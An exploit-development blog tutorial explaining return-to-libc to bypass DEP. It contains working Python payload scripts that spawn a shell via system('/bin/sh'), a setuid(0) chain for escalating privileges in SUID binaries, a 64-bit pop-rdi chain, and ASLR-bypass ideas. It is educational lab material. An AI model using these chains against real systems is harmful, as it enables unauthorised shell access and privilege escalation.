Bypassing DEP with Return-to-libc
Thilan Dissanayaka Exploit Development April 05, 2020

In the Linux buffer overflow tutorial and the Windows buffer overflow tutorial, we exploited stack overflows by injecting shellcode onto the stack and redirecting EIP to execute it. It worked because we disabled DEP.

Now we turn DEP back on and see what happens.

DEP (Data Execution Prevention) marks the stack and heap as non-executable. Even if our shellcode lands perfectly in memory, the CPU checks the page permissions, sees there’s no Execute flag, and raises an access violation. Our shellcode is dead on arrival.

Before DEP:  Stack = RWX → shellcode runs
After DEP:   Stack = RW  → "Access Violation" — can't execute data
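On Linux, the per-mapping permissions that DEP relies on are visible in /proc/<pid>/maps. As a rough sketch, the helper below parses one line of that file and reports whether the mapping is executable. The name mapping_is_executable is hypothetical, and the two sample lines use made-up addresses purely for illustration.

```python
def mapping_is_executable(maps_line: str) -> bool:
    """Return True if a /proc/<pid>/maps line describes an executable mapping."""
    # Fields: address-range, perms (e.g. "rw-p"), offset, dev, inode, [path]
    perms = maps_line.split()[1]
    return "x" in perms


# Illustrative sample lines (addresses and inode are made up)
stack_line = "7ffd1c0e5000-7ffd1c106000 rw-p 00000000 00:00 0    [stack]"
libc_line = "f7e08000-f7fb5000 r-xp 00000000 08:01 123456    /lib32/libc.so.6"

print(mapping_is_executable(stack_line))  # False
print(mapping_is_executable(libc_line))   # True
```

With DEP on, the stack line carries rw- and the libc code mapping carries r-x, which is exactly the asymmetry the rest of this article exploits.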

But here’s the key insight: the code section of the executable and its loaded libraries (libc, kernel32, ntdll) are already executable. They have to be — they contain the program’s own code. What if instead of injecting new code, we just jump to code that already exists?

That’s return-to-libc — the simplest DEP bypass, and the foundation for the more advanced ROP chain technique we’ll cover in the next article.

The Idea

libc (the C standard library) is mapped into the address space of virtually every dynamically linked C program. It contains thousands of useful functions, including system(), which executes a shell command.

If we can make the program call system("/bin/sh"), we get a shell. No shellcode needed. The system() function lives in an executable page (libc’s .text section), so DEP doesn’t block it.

The plan:

  1. Overflow the buffer to overwrite the return address
  2. Set the return address to the address of system() in libc
  3. Arrange the stack so that system() receives "/bin/sh" as its argument
  4. Profit

How Function Calls Work on the Stack (cdecl)

To understand ret2libc, we need to recall how functions are called in 32-bit Linux (cdecl calling convention). If you’ve read the stack and calling conventions article, this is a refresher.

When a program calls system("/bin/sh"), the stack looks like this:

Before the CALL instruction:
┌──────────────────────────┐  ← Higher addresses
│ "/bin/sh" pointer         │  ← Argument (pushed first)
├──────────────────────────┤
│ Return address            │  ← Pushed by CALL instruction
├──────────────────────────┤  ← ESP after CALL (system() starts here)
│ system()'s local frame    │
└──────────────────────────┘  ← Lower addresses

The key layout from system()’s perspective when it starts executing:

ESP →  [ return address after system() finishes ]
ESP+4  [ first argument: pointer to "/bin/sh"    ]

system() reads its argument from ESP+4 (relative to what ESP was when it started). It reads the return address from ESP.

In a normal program, the compiler handles all of this. But in our exploit, we’re not calling system() with a CALL instruction — we’re arriving at system() via a ret. That means we need to set up the stack to look exactly like a real call.

The ret2libc Stack Layout

When the vulnerable function returns, ret pops the top of the stack into EIP. If we’ve overwritten the return address with system()’s address, EIP jumps to system().

At that moment, ESP points to the next value on the stack. From system()’s perspective, the stack looks like a normal call:

Our overflow payload:
┌──────────────────────────────────────────────────────────────────┐
│ Padding (fill buffer + saved EBP) │ system() addr │ return addr │ "/bin/sh" addr │
└──────────────────────────────────────────────────────────────────┘
                                      ↑ popped into EIP by RET
                                                      ↑ ESP points here after RET
                                                                    ↑ ESP+4 = argument

After ret executes:

  • EIP = address of system() — we’re now executing system()
  • ESP points to the “return addr” slot
  • ESP+4 points to the “/bin/sh” pointer — this is system()’s first argument

system() will:

  1. Read its argument from ESP+4 → gets the address of “/bin/sh”
  2. Execute "/bin/sh" → shell spawned
  3. When it finishes, return to the address at ESP → the “return addr” slot

For the return address after system(), we use exit() so the program terminates cleanly instead of crashing.
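To make the layout concrete, here is a small model of what the vulnerable function's ret does to our payload. It is only a sketch: simulate_ret is a hypothetical helper, and the three addresses are placeholders rather than real libc addresses.

```python
import struct


def simulate_ret(payload: bytes, offset: int):
    """Model the vulnerable function's `ret` on a 32-bit overflow payload.

    Returns (eip, return_address, first_argument) as the callee sees them.
    """
    # Everything after the padding is a sequence of little-endian dwords.
    words = struct.unpack_from("<3I", payload, offset)
    eip = words[0]             # popped into EIP by ret
    return_address = words[1]  # now at [ESP]
    first_argument = words[2]  # now at [ESP+4]
    return eip, return_address, first_argument


# Placeholder values, not real addresses
SYSTEM, EXIT, BINSH = 0x11111111, 0x22222222, 0x33333333
payload = b"A" * 44 + struct.pack("<3I", SYSTEM, EXIT, BINSH)

eip, ret_addr, arg = simulate_ret(payload, 44)
print(hex(eip), hex(ret_addr), hex(arg))
```

The function reached through ret sees exactly the frame a real CALL would have produced: a return address at ESP and its first argument at ESP+4.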

Finding the Addresses

We need three addresses:

  1. system() in libc
  2. exit() in libc (for clean return)
  3. The string "/bin/sh" somewhere in memory

Finding system() and exit()

$ gdb ./vulnerable -q
(gdb) break main
(gdb) run
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e42da0 <__libc_system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7e369e0 <__GI_exit>

Finding “/bin/sh”

Here’s a trick — libc itself contains the string “/bin/sh” (it’s used internally by system() and other functions). We can search for it:

(gdb) find &system, +9999999, "/bin/sh"
0xf7f588cf
(gdb) x/s 0xf7f588cf
0xf7f588cf: "/bin/sh"

There it is: a "/bin/sh" string already sitting in libc’s read-only data. We don’t need to put it on the stack ourselves.
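The same search can be done outside GDB by scanning the library file for the NUL-terminated string. The sketch below uses a tiny stand-in byte blob instead of a real libc, and find_cstring is a hypothetical helper. For a real file, the offset found this way usually equals the string's offset from the libc load base, but treat that as an assumption and confirm it in GDB.

```python
def find_cstring(blob: bytes, text: bytes) -> int:
    """Return the offset of the NUL-terminated string `text` in `blob`, or -1."""
    return blob.find(text + b"\x00")


# Tiny stand-in for a library image. With a real file you would read it first:
#   blob = open(path_to_libc, "rb").read()
blob = b"\x7fELF....exit 0\x00/bin/sh\x00sh\x00"

offset = find_cstring(blob, b"/bin/sh")
print(offset, blob[offset:offset + 7])
```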

Finding the Offset

We need to know how many bytes of padding to reach the return address. Use the same cyclic pattern technique from the buffer overflow tutorial:

(gdb) run < <(python3 -c "from pwn import *; print(cyclic(200).decode())")
Program received signal SIGSEGV
(gdb) p $eip
$3 = (void *) 0x6161616c

$ python3 -c "from pwn import *; print(cyclic_find(0x6161616c))"
44

Offset to the return address: 44 bytes (this varies per binary — buffer size + saved EBP).
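If pwntools is not available, the idea behind cyclic and cyclic_find can be sketched in plain Python: generate a de Bruijn sequence in which every 4-byte window is unique, then look up the bytes that landed in EIP. This is a stand-alone illustration of the technique rather than pwntools' own code, and the function names simply mirror the ones used above.

```python
import struct
from itertools import islice


def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a de Bruijn sequence over `alphabet` with window size n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern over a-z with 4-byte windows."""
    return bytes(islice(de_bruijn(b"abcdefghijklmnopqrstuvwxyz", 4), length))


def cyclic_find(eip: int, length: int = 8192) -> int:
    """Offset of the little-endian dword `eip` in the pattern, or -1."""
    return cyclic(length).find(struct.pack("<I", eip))


print(cyclic(16))                  # b'aaaabaaacaaadaaa'
print(cyclic_find(0x6161616c))     # 44
```

0x6161616c is the little-endian encoding of "laaa", which first appears 44 bytes into the pattern, matching the offset found above.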

The Exploit

import struct

# Addresses (found with GDB; they stay constant only while ASLR is disabled)
system_addr = struct.pack("<I", 0xf7e42da0)
exit_addr   = struct.pack("<I", 0xf7e369e0)
binsh_addr  = struct.pack("<I", 0xf7f588cf)

offset = 44  # Padding to reach return address

# Stack layout:
# [padding] [system()] [exit()] ["/bin/sh"]
payload = b"A" * offset + system_addr + exit_addr + binsh_addr

with open("payload", "wb") as f:
    f.write(payload)

$ (cat payload; cat) | ./vulnerable
whoami
thilan
id
uid=1000(thilan) gid=1000(thilan) groups=1000(thilan)

Shell. No shellcode. No executable stack. DEP is on. We just called a function that was already there.

Understanding Each Byte

Let’s trace through the exploit byte by byte:

Payload: AAAA...AAAA  \xa0\x2d\xe4\xf7  \xe0\x69\xe3\xf7  \xcf\x88\xf5\xf7
         ←── 44 A's ──→  ←─ system() ──→  ←── exit() ──→  ←─ "/bin/sh" ─→
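The byte order in the payload line follows from x86 being little-endian: the least significant byte of each address is stored first. A quick check with struct, using the addresses found earlier (le32 is just a local helper name):

```python
import struct


def le32(addr: int) -> bytes:
    """Encode a 32-bit address the way it sits in x86 memory."""
    return struct.pack("<I", addr)


for name, addr in [("system", 0xf7e42da0), ("exit", 0xf7e369e0), ("/bin/sh", 0xf7f588cf)]:
    print(f"{name:8} {addr:#010x} -> {le32(addr).hex(' ')}")
```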

Before the vulnerable function returns:

Stack:
ESP → 0xf7e42da0   ← system() address (about to be popped into EIP)
      0xf7e369e0   ← exit() address (system's "return address")
      0xf7f588cf   ← "/bin/sh" address (system's argument)

ret executes — pops into EIP:

EIP = 0xf7e42da0 (system)
ESP → 0xf7e369e0   ← system() sees this as its return address
      0xf7f588cf   ← system() sees this as its first argument (ESP+4)

system() executes:

  1. Reads ESP+4 → 0xf7f588cf → dereferences → "/bin/sh"
  2. Calls /bin/sh → shell spawned

When shell exits, system() returns:

  1. Its ret pops the value at ESP → 0xf7e369e0 → jumps to exit()
  2. Program terminates cleanly

Chaining Multiple Functions

What if you need to do more than just call system()? For example, call setuid(0) first (to elevate privileges in a SUID binary), then call system("/bin/sh").

The trick is managing the return address between calls. After setuid() returns, ESP points at its already-used argument, not at the next function’s address. We need to “clean up” the stack before the next function call.

The Stack Cleanup Problem

After setuid(0) returns:

ESP → [setuid's argument: 0]   ← ESP is here, pointing at a stale argument

We need ESP to move past the argument and land on the next function’s address. The solution: a pop; ret gadget.

A pop; ret gadget does exactly what we need:

  1. pop removes one value from the stack (the used argument)
  2. ret pops the next value into EIP (the next function)

Payload for setuid(0) → system("/bin/sh"):

[padding] [setuid] [pop;ret gadget] [0] [system] [exit] ["/bin/sh"]
                    ↑ return from setuid
                                     ↑ setuid's arg (popped by gadget)
                                         ↑ popped into EIP by gadget's ret

Finding a pop; ret gadget:

$ ROPgadget --binary ./vulnerable --only "pop|ret"
0x0804856b : pop ebx ; ret

The exploit:

import struct
p = lambda x: struct.pack("<I", x)

offset    = 44
setuid    = p(0xf7e5f170)   # setuid() address
pop_ret   = p(0x0804856b)   # pop ebx; ret gadget
arg_0     = p(0x00000000)   # setuid(0)
system    = p(0xf7e42da0)   # system() address
exit_fn   = p(0xf7e369e0)   # exit() address
binsh     = p(0xf7f588cf)   # "/bin/sh" address

payload  = b"A" * offset
payload += setuid             # First call: setuid
payload += pop_ret            # Return from setuid → pop arg, then ret to next
payload += arg_0              # setuid's argument: 0
payload += system             # Second call: system
payload += exit_fn            # Return from system → exit
payload += binsh              # system's argument: "/bin/sh"

with open("payload", "wb") as f:
    f.write(payload)

This pop; ret pattern for chaining function calls is the stepping stone to full ROP. Once you start thinking in terms of “gadgets that clean up the stack and return to the next thing,” you’re already doing ROP — just with function-sized gadgets instead of instruction-sized ones.
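To check a chain before throwing it at the target, it helps to walk it by hand. The sketch below is a toy emulator with hypothetical names: it knows only three kinds of address (a function that returns, a pop; ret gadget, and a function that never returns) and lists the calls the chain would make. The addresses are the example values from this article.

```python
def run_chain(stack, functions, pop_ret_gadgets, terminators):
    """Walk a 32-bit ret2libc chain and list the calls it would make.

    stack            -- dwords placed after the padding, lowest address first
    functions        -- {address: name} for functions that return normally
    pop_ret_gadgets  -- set of addresses of `pop reg; ret` gadgets
    terminators      -- {address: name} for functions that never return
    """
    calls = []
    esp = 0
    eip = stack[esp]                      # the vulnerable function's ret
    esp += 1
    while True:
        if eip in terminators:
            calls.append((terminators[eip], None))
            return calls
        if eip in functions:
            # At entry: stack[esp] = return address, stack[esp + 1] = argument
            calls.append((functions[eip], stack[esp + 1]))
            eip = stack[esp]              # the function's own ret
            esp += 1
        elif eip in pop_ret_gadgets:
            esp += 1                      # pop reg: discard the used argument
            eip = stack[esp]              # ret: continue with the next entry
            esp += 1
        else:
            raise ValueError(f"chain jumps to unknown address {eip:#x}")


SETUID, POP_RET, SYSTEM = 0xf7e5f170, 0x0804856b, 0xf7e42da0
EXIT, BINSH = 0xf7e369e0, 0xf7f588cf

chain = [SETUID, POP_RET, 0, SYSTEM, EXIT, BINSH]
calls = run_chain(chain, {SETUID: "setuid", SYSTEM: "system"}, {POP_RET}, {EXIT: "exit"})
for name, arg in calls:
    print(name, None if arg is None else hex(arg))
```

The walk reports setuid(0), then system with the "/bin/sh" pointer, then exit, which is the intended order. Dropping the gadget from the chain makes the emulator raise, because execution would "return" into the argument 0.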

ret2libc on 64-bit

On x86-64, function arguments go in registers (rdi, rsi, rdx, rcx, r8, r9), not on the stack. So we can’t just place the argument after the function address — we need to load it into rdi first.

This requires a gadget: pop rdi; ret

$ ROPgadget --binary ./vulnerable --only "pop|ret" | grep "pop rdi"
0x00400753 : pop rdi ; ret

import struct
p64 = lambda x: struct.pack("<Q", x)

offset   = 72                    # Different for 64-bit
pop_rdi  = p64(0x00400753)       # pop rdi; ret
binsh    = p64(0x7ffff7f588cf)   # "/bin/sh" in libc
ret      = p64(0x00400754)       # ret (stack alignment)
system   = p64(0x7ffff7e42da0)   # system() in libc

payload  = b"A" * offset
payload += pop_rdi               # Load argument into rdi
payload += binsh                 # rdi = "/bin/sh"
payload += ret                   # Stack alignment (16-byte boundary)
payload += system                # Call system("/bin/sh")

with open("payload", "wb") as f:
    f.write(payload)

Notice the extra ret gadget before system(). On 64-bit Linux, the System V ABI requires the stack to be 16-byte aligned before a call. If alignment is off, system() can crash on a movaps instruction that expects an aligned operand. The extra ret moves RSP by 8 bytes to fix the alignment.

This 64-bit version already looks like a ROP chain — we’re using gadgets (pop rdi; ret) to set up registers. The line between “ret2libc” and “ROP” is blurry on 64-bit systems.
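The alignment argument is simple arithmetic, sketched below. It assumes the vulnerable function itself was called with a correctly aligned stack, so its saved return address sits at an address that is 8 modulo 16. RETURN_SLOT is a hypothetical value chosen to satisfy that, and both helper names are made up for this example.

```python
def rsp_at_entry(return_slot: int, chain_index: int) -> int:
    """RSP when the chain entry at `chain_index` (0-based qword) starts executing."""
    # Every ret or pop consumes one 8-byte slot, so by the time entry i
    # runs, RSP has moved past slots 0..i.
    return return_slot + 8 * (chain_index + 1)


def entry_is_aligned(rsp: int) -> bool:
    """System V x86-64: at function entry, RSP + 8 must be a multiple of 16."""
    return (rsp + 8) % 16 == 0


RETURN_SLOT = 0x7fffffffe008   # hypothetical address of the saved return address

without_ret = ["pop_rdi", "binsh", "system"]
with_ret = ["pop_rdi", "binsh", "ret", "system"]

for chain in (without_ret, with_ret):
    rsp = rsp_at_entry(RETURN_SLOT, chain.index("system"))
    print(chain, hex(rsp), entry_is_aligned(rsp))
```

Without the extra ret, system() starts with RSP 8 bytes away from where the ABI expects it; with the extra ret it lines up. Whether the misaligned version actually crashes depends on how that libc build was compiled, so the padding ret is best treated as cheap insurance.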

The Elephant in the Room — ASLR

Everything above assumes we know the exact address of system(), exit(), and "/bin/sh". With ASLR disabled, these addresses are the same every run. With ASLR enabled, libc loads at a random base address each time.

To defeat ASLR, we need to leak a libc address at runtime — discover where libc actually loaded — and calculate our target addresses from that leak.

Common leak techniques:

  • Format string vulnerabilities: use %p to print stack values that contain libc pointers
  • GOT/PLT leaks: if the binary has an information disclosure, read a GOT entry to get a resolved libc address
  • Partial overwrite: on 32-bit, ASLR has low entropy, and the lower 12 bits of libc addresses are constant (page alignment). A 1-2 byte overwrite can redirect execution without knowing the full address.
  • Brute force (32-bit only): with roughly 8-12 bits of ASLR entropy, expect 256 to 4096 attempts. Against a forking server, this takes seconds.

We’ll combine ret2libc with ASLR bypass techniques using format string leaks in a future article. For now, the important takeaway: ret2libc works against DEP, but not against ASLR (without an additional info leak).
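Once a single libc address has leaked, the rest is subtraction and addition, because every symbol sits at a fixed offset from the libc base. A minimal sketch follows: the offsets are derived from the example addresses in this article under an assumed load base of 0xf7e08000, and the leaked value is invented, so none of these numbers should be reused against a real target.

```python
# Offsets of each symbol from the start of libc. They are derived from the
# example addresses in this article under an ASSUMED load base of 0xf7e08000;
# a real exploit must take them from the target's exact libc build.
OFFSETS = {"system": 0x3ada0, "exit": 0x2e9e0, "binsh": 0x1508cf}


def resolve(leaked_addr: int, leaked_symbol: str) -> dict:
    """Turn one leaked libc address into absolute addresses for every symbol."""
    base = leaked_addr - OFFSETS[leaked_symbol]
    if base & 0xfff:
        raise ValueError("libc base is not page-aligned; wrong offset or bad leak")
    return {name: base + off for name, off in OFFSETS.items()}


addrs = resolve(0xf7d9fda0, "system")   # hypothetical leak from a randomized run
print({name: hex(addr) for name, addr in addrs.items()})
```

The page-alignment check is a cheap sanity test: libc is always mapped on a page boundary, so a computed base with non-zero low 12 bits means the leak or the offsets are wrong.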

Limitations of ret2libc

ret2libc gets you a shell, and that’s often enough. But it has limitations:

  1. Limited to existing functions — You can only call functions available in the binary or its libraries. Complex operations (setting up sockets, encoding data) require chaining many calls.

  2. Argument setup is awkward — On 32-bit, arguments go on the stack, which is manageable. But multi-argument functions require careful stack layout. On 64-bit, you need register-setting gadgets, which is essentially ROP.

  3. Stack cleanup between calls — Chaining multiple function calls requires pop; ret gadgets to clean up arguments between calls.

  4. Not Turing-complete — ret2libc alone can’t do arbitrary computation. You’re limited to calling existing functions with controllable arguments.

For more complex exploits — writing to arbitrary memory, setting up multiple registers, performing conditional logic — you need the full power of Return-Oriented Programming. That’s the next article.

Summary

Concept            Details
-----------------  ------------------------------------------------------------
The problem        DEP makes the stack non-executable, so shellcode can’t run
The solution       Don’t inject code; call functions already in libc
Key target         system("/bin/sh"), which spawns a shell
Stack layout       [padding] [system] [exit] ["/bin/sh"]
Finding addresses  GDB: p system, p exit, find "/bin/sh"
Chaining calls     Use pop; ret gadgets between functions
64-bit difference  Arguments in registers; need a pop rdi; ret gadget
Limitation         ASLR breaks it (need an info leak to find libc addresses)

ret2libc is the gateway to modern exploitation. It introduced the core idea — reuse existing code instead of injecting your own — and paved the way for ROP, which generalizes this concept to arbitrary computation.

Happy reversing!
